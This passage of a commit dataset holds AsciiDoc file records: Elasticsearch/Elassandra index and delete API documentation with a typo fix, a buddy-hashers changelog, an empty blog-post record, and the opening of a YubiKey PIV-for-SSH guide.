creation\n\nThe delete operation automatically creates an index if it has not been\ncreated before (check out the <<indices-create-index,create index API>>\nfor manually creating an index), and also automatically creates a\ndynamic type mapping for the specific type if it has not been created\nbefore (check out the <<indices-put-mapping,put mapping>>\nAPI for manually creating type mapping).\n\n[float]\n[[delete-distributed]]\n=== Distributed\n\nThe delete operation gets hashed into a specific shard id. It then gets\nredirected into the primary shard within that id group, and replicated\n(if needed) to shard replicas within that id group.\n\n[float]\n[[delete-wait-for-active-shards]]\n=== Wait For Active Shards\n\nWhen making delete requests, you can set the `wait_for_active_shards`\nparameter to require a minimum number of shard copies to be active\nbefore starting to process the delete request. See\n<<index-wait-for-active-shards,here>> for further details and a usage\nexample.\n\n[float]\n[[delete-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh>>.\n\n\n[float]\n[[delete-timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the delete operation might not be\navailable when the delete operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a store\nor undergoing relocation. By default, the delete operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?timeout=5m'\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ac7a4d279d9ab020e0e47ebb2301fa1275f5328","subject":"[Docs] Fix typo in index API documentation (#43740)","message":"[Docs] Fix typo in index API documentation (#43740)\n\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/docs\/index_.asciidoc","new_file":"docs\/reference\/docs\/index_.asciidoc","new_contents":"[[docs-index_]]\n== Index API\n\nIMPORTANT: See <<removal-of-types>>.\n\nThe index API adds or updates a typed JSON document in a specific index,\nmaking it searchable. The following example inserts the JSON document\ninto the \"twitter\" index, under a type called `_doc` with an id of 1:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\" : \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nThe `_shards` header provides information about the replication process of the index operation:\n\n`total`:: Indicates how many shard copies (primary and replica shards) the index operation should be executed on.\n`successful`:: Indicates the number of shard copies the index operation succeeded on.\n`failed`:: An array that contains replication-related errors in the case an index operation failed on a replica shard.\n\nThe index operation is successful in the case `successful` is at least 1.\n\nNOTE: Replica shards may not all be started when an indexing operation successfully returns (by default, only the\n primary is required, but this behavior can be <<index-wait-for-active-shards,changed>>). In that case,\n `total` will be equal to the total shards based on the `number_of_replicas` setting and `successful` will be\n equal to the number of shards started (primary plus replicas). If there were no failures, the `failed` will be 0.\n\n[float]\n[[index-creation]]\n=== Automatic Index Creation\n\nThe index operation automatically creates an index if it does not already\nexist, and applies any <<indices-templates,index templates>> that are\nconfigured. The index operation also creates a dynamic type mapping for the\nspecified type if one does not already exist. By default, new fields and\nobjects will automatically be added to the mapping definition for the specified\ntype if needed. Check out the <<mapping,mapping>> section for more information\non mapping definitions, and the <<indices-put-mapping,put mapping>> API for\ninformation about updating type mappings manually.\n\nAutomatic index creation is controlled by the `action.auto_create_index`\nsetting. This setting defaults to `true`, meaning that indices are always\nautomatically created. Automatic index creation can be permitted only for\nindices matching certain patterns by changing the value of this setting to a\ncomma-separated list of these patterns. It can also be explicitly permitted and\nforbidden by prefixing patterns in the list with a `+` or `-`. Finally it can\nbe completely disabled by changing this setting to `false`.\n\n[source,js]\n--------------------------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"twitter,index10,-index1*,+ind*\" <1>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"false\" <2>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"true\" <3>\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Permit only the auto-creation of indices called `twitter`, `index10`, no\nother index matching `index1*`, and any other index matching `ind*`. The\npatterns are matched in the order in which they are given.\n\n<2> Completely disable the auto-creation of indices.\n\n<3> Permit the auto-creation of indices with any name. This is the default.\n\n[float]\n[[operation-type]]\n=== Operation Type\n\nThe index operation also accepts an `op_type` that can be used to force\na `create` operation, allowing for \"put-if-absent\" behavior. When\n`create` is used, the index operation will fail if a document by that id\nalready exists in the index.\n\nHere is an example of using the `op_type` parameter:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?op_type=create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nAnother option to specify `create` is to use the following uri:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\/_create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Automatic ID Generation\n\nThe index operation can be executed without specifying the id. In such a\ncase, an id will be generated automatically. In addition, the `op_type`\nwill automatically be set to `create`. Here is an example (note the\n*POST* used instead of *PUT*):\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc\/\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"W0tpsmIBdwcYyG50zbta\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\": \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/W0tpsmIBdwcYyG50zbta\/$body._id\/ s\/\"successful\" : 2\/\"successful\" : 1\/]\n\n[float]\n[[optimistic-concurrency-control-index]]\n=== Optimistic concurrency control\n\nIndex operations can be made conditional and only be performed if the last\nmodification to the document was assigned the sequence number and primary \nterm specified by the `if_seq_no` and `if_primary_term` parameters. If a\nmismatch is detected, the operation will result in a `VersionConflictException`\nand a status code of 409. See <<optimistic-concurrency-control>> for more details. \n\n[float]\n[[index-routing]]\n=== Routing\n\nBy default, shard placement \u2014 or `routing` \u2014 is controlled by using a\nhash of the document's id value. For more explicit control, the value\nfed into the hash function used by the router can be directly specified\non a per-operation basis using the `routing` parameter. For example:\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc?routing=kimchy\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the example above, the \"_doc\" document is routed to a shard based on\nthe `routing` parameter provided: \"kimchy\".\n\nWhen setting up explicit mapping, the `_routing` field can be optionally\nused to direct the index operation to extract the routing value from the\ndocument itself. This does come at the (very minimal) cost of an\nadditional document parsing pass. If the `_routing` mapping is defined\nand set to be `required`, the index operation will fail if no routing\nvalue is provided or extracted.\n\n[float]\n[[index-distributed]]\n=== Distributed\n\nThe index operation is directed to the primary shard based on its route\n(see the Routing section above) and performed on the actual node\ncontaining this shard. After the primary shard completes the operation,\nif needed, the update is distributed to applicable replicas.\n\n[float]\n[[index-wait-for-active-shards]]\n=== Wait For Active Shards\n\nTo improve the resiliency of writes to the system, indexing operations\ncan be configured to wait for a certain number of active shard copies\nbefore proceeding with the operation. If the requisite number of active\nshard copies are not available, then the write operation must wait and\nretry, until either the requisite shard copies have started or a timeout\noccurs. By default, write operations only wait for the primary shards\nto be active before proceeding (i.e. `wait_for_active_shards=1`).\nThis default can be overridden in the index settings dynamically\nby setting `index.write.wait_for_active_shards`. To alter this behavior\nper operation, the `wait_for_active_shards` request parameter can be used.\n\nValid values are `all` or any positive integer up to the total number\nof configured copies per shard in the index (which is `number_of_replicas+1`).\nSpecifying a negative value or a number greater than the number of\nshard copies will throw an error.\n\nFor example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and\nwe create an index `index` with the number of replicas set to 3 (resulting in\n4 shard copies, one more copy than there are nodes). If we\nattempt an indexing operation, by default the operation will only ensure\nthe primary copy of each shard is available before proceeding. This means\nthat even if `B` and `C` went down, and `A` hosted the primary shard copies,\nthe indexing operation would still proceed with only one copy of the data.\nIf `wait_for_active_shards` is set on the request to `3` (and all 3 nodes\nare up), then the indexing operation will require 3 active shard copies\nbefore proceeding, a requirement which should be met because there are 3\nactive nodes in the cluster, each one holding a copy of the shard. However,\nif we set `wait_for_active_shards` to `all` (or to `4`, which is the same),\nthe indexing operation will not proceed as we do not have all 4 copies of\neach shard active in the index. The operation will timeout\nunless a new node is brought up in the cluster to host the fourth copy of\nthe shard.\n\nIt is important to note that this setting greatly reduces the chances of\nthe write operation not writing to the requisite number of shard copies,\nbut it does not completely eliminate the possibility, because this check\noccurs before the write operation commences. Once the write operation\nis underway, it is still possible for replication to fail on any number of\nshard copies but still succeed on the primary. The `_shards` section of the\nwrite operation's response reveals the number of shard copies on which\nreplication succeeded\/failed.\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[float]\n[[index-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh,refresh>>.\n\n[float]\n[[index-noop]]\n=== Noop Updates\n\nWhen updating a document using the index API a new version of the document is\nalways created even if the document hasn't changed. If this isn't acceptable\nuse the `_update` API with `detect_noop` set to true. This option isn't\navailable on the index API because the index API doesn't fetch the old source\nand isn't able to compare it against the new source.\n\nThere isn't a hard and fast rule about when noop updates aren't acceptable.\nIt's a combination of lots of factors like how frequently your data source\nsends updates that are actually noops and how many queries per second\nElasticsearch runs on the shard receiving the updates.\n\n[float]\n[[timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the index operation might not be\navailable when the index operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a gateway\nor undergoing relocation. By default, the index operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?timeout=5m\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[index-versioning]]\n=== Versioning\n\nEach indexed document is given a version number. By default, \ninternal versioning is used that starts at 1 and increments\nwith each update, deletes included. Optionally, the version number can be\nset to an external value (for example, if maintained in a\ndatabase). To enable this functionality, `version_type` should be set to\n`external`. The value provided must be a numeric, long value greater than or equal to 0,\nand less than around 9.2e+18. \n\nWhen using the external version type, the system checks to see if\nthe version number passed to the index request is greater than the\nversion of the currently stored document. If true, the document will be\nindexed and the new version number used. If the value provided is less\nthan or equal to the stored document's version number, a version\nconflict will occur and the index operation will fail. For example:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?version=2&version_type=external\n{\n \"message\" : \"elasticsearch now has versioning support, double cool!\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n*NOTE:* Versioning is completely real time, and is not affected by the\nnear real time aspects of search operations. If no version is provided,\nthen the operation is executed without any version checks.\n\nThe above will succeed since the supplied version of 2 is higher than\nthe current document version of 1. If the document was already updated\nand its version was set to 2 or higher, the indexing command will fail\nand result in a conflict (409 http status code).\n\nA nice side effect is that there is no need to maintain strict ordering\nof async indexing operations executed as a result of changes to a source\ndatabase, as long as version numbers from the source database are used.\nEven the simple case of updating the Elasticsearch index using data from\na database is simplified if external versioning is used, as only the\nlatest version will be used if the index operations arrive out of order for\nwhatever reason.\n\n[float]\n==== Version types\n\nNext to the `external` version type explained above, Elasticsearch\nalso supports other types for specific use cases. Here is an overview of\nthe different version types and their semantics.\n\n`internal`:: Only index the document if the given version is identical to the version\nof the stored document.\nifdef::asciidoctor[]\ndeprecated:[6.7.0, \"Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.\"]\nendif::[]\nifndef::asciidoctor[]\ndeprecated[6.7.0, Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.]\nendif::[]\n\n\n`external` or `external_gt`:: Only index the document if the given version is strictly higher\nthan the version of the stored document *or* if there is no existing document. The given\nversion will be used as the new version and will be stored with the new document. The supplied\nversion must be a non-negative long number.\n\n`external_gte`:: Only index the document if the given version is *equal* or higher\nthan the version of the stored document. If there is no existing document\nthe operation will succeed as well. The given version will be used as the new version\nand will be stored with the new document. The supplied version must be a non-negative long number.\n\n*NOTE*: The `external_gte` version type is meant for special use cases and\nshould be used with care. If used incorrectly, it can result in loss of data.\nThere is another option, `force`, which is deprecated because it can cause\nprimary and replica shards to diverge.\n\n","old_contents":"[[docs-index_]]\n== Index API\n\nIMPORTANT: See <<removal-of-types>>.\n\nThe index API adds or updates a typed JSON document in a specific index,\nmaking it searchable. The following example inserts the JSON document\ninto the \"twitter\" index, under a type called `_doc` with an id of 1:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\" : \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nThe `_shards` header provides information about the replication process of the index operation:\n\n`total`:: Indicates how many shard copies (primary and replica shards) the index operation should be executed on.\n`successful`:: Indicates the number of shard copies the index operation succeeded on.\n`failed`:: An array that contains replication-related errors in the case an index operation failed on a replica shard.\n\nThe index operation is successful in the case `successful` is at least 1.\n\nNOTE: Replica shards may not all be started when an indexing operation successfully returns (by default, only the\n primary is required, but this behavior can be <<index-wait-for-active-shards,changed>>). In that case,\n `total` will be equal to the total shards based on the `number_of_replicas` setting and `successful` will be\n equal to the number of shards started (primary plus replicas). If there were no failures, the `failed` will be 0.\n\n[float]\n[[index-creation]]\n=== Automatic Index Creation\n\nThe index operation automatically creates an index if it does not already\nexist, and applies any <<indices-templates,index templates>> that are\nconfigured. The index operation also creates a dynamic type mapping for the\nspecified type if one does not already exist. By default, new fields and\nobjects will automatically be added to the mapping definition for the specified\ntype if needed. Check out the <<mapping,mapping>> section for more information\non mapping definitions, and the <<indices-put-mapping,put mapping>> API for\ninformation about updating type mappings manually.\n\nAutomatic index creation is controlled by the `action.auto_create_index`\nsetting. This setting defaults to `true`, meaning that indices are always\nautomatically created. Automatic index creation can be permitted only for\nindices matching certain patterns by changing the value of this setting to a\ncomma-separated list of these patterns. It can also be explicitly permitted and\nforbidden by prefixing patterns in the list with a `+` or `-`. Finally it can\nbe completely disabled by changing this setting to `false`.\n\n[source,js]\n--------------------------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"twitter,index10,-index1*,+ind*\" <1>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"false\" <2>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"true\" <3>\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Permit only the auto-creation of indices called `twitter`, `index10`, no\nother index matching `index1*`, and any other index matching `ind*`. The\npatterns are matched in the order in which they are given.\n\n<2> Completely disable the auto-creation of indices.\n\n<3> Permit the auto-creation of indices with any name. This is the default.\n\n[float]\n[[operation-type]]\n=== Operation Type\n\nThe index operation also accepts an `op_type` that can be used to force\na `create` operation, allowing for \"put-if-absent\" behavior. When\n`create` is used, the index operation will fail if a document by that id\nalready exists in the index.\n\nHere is an example of using the `op_type` parameter:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?op_type=create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nAnother option to specify `create` is to use the following uri:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\/_create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Automatic ID Generation\n\nThe index operation can be executed without specifying the id. In such a\ncase, an id will be generated automatically. In addition, the `op_type`\nwill automatically be set to `create`. Here is an example (note the\n*POST* used instead of *PUT*):\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc\/\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"W0tpsmIBdwcYyG50zbta\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\": \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/W0tpsmIBdwcYyG50zbta\/$body._id\/ s\/\"successful\" : 2\/\"successful\" : 1\/]\n\n[float]\n[[optimistic-concurrency-control-index]]\n=== Optimistic concurrency control\n\nIndex operations can be made conditional and only be performed if the last\nmodification to the document was assigned the sequence number and primary \nterm specified by the `if_seq_no` and `if_primary_term` parameters. If a\nmismatch is detected, the operation will result in a `VersionConflictException`\nand a status code of 409. See <<optimistic-concurrency-control>> for more details. \n\n[float]\n[[index-routing]]\n=== Routing\n\nBy default, shard placement \u2014 or `routing` \u2014 is controlled by using a\nhash of the document's id value. For more explicit control, the value\nfed into the hash function used by the router can be directly specified\non a per-operation basis using the `routing` parameter. For example:\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc?routing=kimchy\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the example above, the \"_doc\" document is routed to a shard based on\nthe `routing` parameter provided: \"kimchy\".\n\nWhen setting up explicit mapping, the `_routing` field can be optionally\nused to direct the index operation to extract the routing value from the\ndocument itself. This does come at the (very minimal) cost of an\nadditional document parsing pass. If the `_routing` mapping is defined\nand set to be `required`, the index operation will fail if no routing\nvalue is provided or extracted.\n\n[float]\n[[index-distributed]]\n=== Distributed\n\nThe index operation is directed to the primary shard based on its route\n(see the Routing section above) and performed on the actual node\ncontaining this shard. After the primary shard completes the operation,\nif needed, the update is distributed to applicable replicas.\n\n[float]\n[[index-wait-for-active-shards]]\n=== Wait For Active Shards\n\nTo improve the resiliency of writes to the system, indexing operations\ncan be configured to wait for a certain number of active shard copies\nbefore proceeding with the operation. If the requisite number of active\nshard copies are not available, then the write operation must wait and\nretry, until either the requisite shard copies have started or a timeout\noccurs. By default, write operations only wait for the primary shards\nto be active before proceeding (i.e. `wait_for_active_shards=1`).\nThis default can be overridden in the index settings dynamically\nby setting `index.write.wait_for_active_shards`. To alter this behavior\nper operation, the `wait_for_active_shards` request parameter can be used.\n\nValid values are `all` or any positive integer up to the total number\nof configured copies per shard in the index (which is `number_of_replicas+1`).\nSpecifying a negative value or a number greater than the number of\nshard copies will throw an error.\n\nFor example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and\nwe create an index `index` with the number of replicas set to 3 (resulting in\n4 shard copies, one more copy than there are nodes). If we\nattempt an indexing operation, by default the operation will only ensure\nthe primary copy of each shard is available before proceeding. This means\nthat even if `B` and `C` went down, and `A` hosted the primary shard copies,\nthe indexing operation would still proceed with only one copy of the data.\nIf `wait_for_active_shards` is set on the request to `3` (and all 3 nodes\nare up), then the indexing operation will require 3 active shard copies\nbefore proceeding, a requirement which should be met because there are 3\nactive nodes in the cluster, each one holding a copy of the shard. However,\nif we set `wait_for_active_shards` to `all` (or to `4`, which is the same),\nthe indexing operation will not proceed as we do not have all 4 copies of\neach shard active in the index. The operation will timeout\nunless a new node is brought up in the cluster to host the fourth copy of\nthe shard.\n\nIt is important to note that this setting greatly reduces the chances of\nthe write operation not writing to the requisite number of shard copies,\nbut it does not completely eliminate the possibility, because this check\noccurs before the write operation commences. Once the write operation\nis underway, it is still possible for replication to fail on any number of\nshard copies but still succeed on the primary. The `_shards` section of the\nwrite operation's response reveals the number of shard copies on which\nreplication succeeded\/failed.\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[float]\n[[index-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh,refresh>>.\n\n[float]\n[[index-noop]]\n=== Noop Updates\n\nWhen updating a document using the index API a new version of the document is\nalways created even if the document hasn't changed. If this isn't acceptable\nuse the `_update` API with `detect_noop` set to true. This option isn't\navailable on the index API because the index API doesn't fetch the old source\nand isn't able to compare it against the new source.\n\nThere isn't a hard and fast rule about when noop updates aren't acceptable.\nIt's a combination of lots of factors like how frequently your data source\nsends updates that are actually noops and how many queries per second\nElasticsearch runs on the shard receiving the updates.\n\n[float]\n[[timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the index operation might not be\navailable when the index operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a gateway\nor undergoing relocation. By default, the index operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?timeout=5m\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[index-versioning]]\n=== Versioning\n\nEach indexed document is given a version number. By default, \ninternal versioning is used that starts at 1 and increments\nwith each update, deletes included. Optionally, the version number can be\nset to an external value (for example, if maintained in a\ndatabase). To enable this functionality, `version_type` should be set to\n`external`. The value provided must be a numeric, long value greater than or equal to 0,\nand less than around 9.2e+18. \n\nWhen using the external version type, the system checks to see if\nthe version number passed to the index request is greater than the\nversion of the currently stored document. If true, the document will be\nindexed and the new version number used. If the value provided is less\nthan or equal to the stored document's version number, a version\nconflict will occur and the index operation will fail. For example:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?version=2&version_type=external\n{\n \"message\" : \"elasticsearch now has versioning support, double cool!\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n*NOTE:* Versioning is completely real time, and is not affected by the\nnear real time aspects of search operations. If no version is provided,\nthen the operation is executed without any version checks.\n\nThe above will succeed since the the supplied version of 2 is higher than\nthe current document version of 1. If the document was already updated\nand its version was set to 2 or higher, the indexing command will fail\nand result in a conflict (409 http status code).\n\nA nice side effect is that there is no need to maintain strict ordering\nof async indexing operations executed as a result of changes to a source\ndatabase, as long as version numbers from the source database are used.\nEven the simple case of updating the Elasticsearch index using data from\na database is simplified if external versioning is used, as only the\nlatest version will be used if the index operations arrive out of order for\nwhatever reason.\n\n[float]\n==== Version types\n\nNext to the `external` version type explained above, Elasticsearch\nalso supports other types for specific use cases. Here is an overview of\nthe different version types and their semantics.\n\n`internal`:: Only index the document if the given version is identical to the version\nof the stored document.\nifdef::asciidoctor[]\ndeprecated:[6.7.0, \"Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.\"]\nendif::[]\nifndef::asciidoctor[]\ndeprecated[6.7.0, Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.]\nendif::[]\n\n\n`external` or `external_gt`:: Only index the document if the given version is strictly higher\nthan the version of the stored document *or* if there is no existing document. The given\nversion will be used as the new version and will be stored with the new document. The supplied\nversion must be a non-negative long number.\n\n`external_gte`:: Only index the document if the given version is *equal* or higher\nthan the version of the stored document. If there is no existing document\nthe operation will succeed as well. The given version will be used as the new version\nand will be stored with the new document. The supplied version must be a non-negative long number.\n\n*NOTE*: The `external_gte` version type is meant for special use cases and\nshould be used with care. If used incorrectly, it can result in loss of data.\nThere is another option, `force`, which is deprecated because it can cause\nprimary and replica shards to diverge.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbe8915cf8d7c3f258cff92ae459eed43a7f973e","subject":"Update changelog.","message":"Update changelog.\n","repos":"funcool\/buddy-hashers,rorygibson\/buddy-hashers,rorygibson\/buddy-hashers,funcool\/buddy-hashers","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"= Changelog\n\n== Version 0.6.0\n\nDate: 2015-06-28\n\n- Update to buddy-core 0.6.0\n\n\n== Version 0.5.0\n\nDate: 2015-06-15\n\n- `check` function is now null pointer safe.\n\n\n== Version 0.4.2\n\nDate: 2015-04-03\n\n- Update buddy-core to 0.5.0\n\n\n== Version 0.4.1\n\nDate: 2015-03-14\n\n- Update buddy-core from 0.4.0 to 0.4.2\n\n\n== Version 0.4.0\n\nDate: 2015-02-22\n\n- Update buddy-core dependency version to 0.4.0\n- Adapt the code to buddy-core 0.4.0\n\n\n== Version 0.3.0\n\nDate: 2015-01-18\n\n- First version splitted from monolitic buddy package.\n- Add complete refactored version of hashers, more flexible and extensible.\n- Add support for pbkdf2+sha256 and pbkdf2+sha3_256 password hasher algorithms.\n- Maintain the old namespace for backward compatibility.","old_contents":"= Changelog\n\n== Version 0.5.0\n\nDate: 2015-06-15\n\n- `check` function is now null pointer safe.\n\n\n== Version 0.4.2\n\nDate: 2015-04-03\n\n- Update buddy-core to 0.5.0\n\n\n== Version 0.4.1\n\nDate: 2015-03-14\n\n- Update buddy-core from 0.4.0 to 0.4.2\n\n\n== Version 0.4.0\n\nDate: 2015-02-22\n\n- Update buddy-core dependency version to 0.4.0\n- Adapt the code to buddy-core 0.4.0\n\n\n== Version 0.3.0\n\nDate: 2015-01-18\n\n- First version splitted from monolitic buddy package.\n- Add complete refactored version of hashers, more flexible and extensible.\n- Add support for pbkdf2+sha256 and pbkdf2+sha3_256 password hasher algorithms.\n- Maintain the old namespace for backward compatibility.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c73237b85b1d01a183a41af2aed56221db47f509","subject":"Update 2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","message":"Update 2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"ae63ca7ce854c0e03cf30a74d191b01ea63529cd","subject":"Fix AsciiDoc issue","message":"Fix AsciiDoc issue\n","repos":"akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/SSH_with_PIV_and_PKCS11.adoc","new_file":"doc\/SSH_with_PIV_and_PKCS11.adoc","new_contents":"Using PIV for SSH through PKCS11\n--------------------------------\n\nThis is a step-by-step for how to get a YubiKey with PIV to work for\npublic-key authentication with OpenSSH through PKCS11.\nPrimarily on a OS X or Linux system.\n\nPrerequisites\n-------------\n\n* a YubiKey with the PIV application loaded\n* the yubico-piv-tool software\n* the OpenSC software\n* OpenSSH\n** If you are using OSX El Capitan (10.11) or earlier, for ssh-agent to work a newer OpenSSH than is delivered with the system; macOS Sierra (10.12) contains a compatible version\n\n[NOTE]\nThe following example assume that you have not yet changed the management key. If you have changed the management key, add `--key` to the `yubico-piv-tool -a import-certificate` command below.\n\n\nSteps\n-----\n\n1. 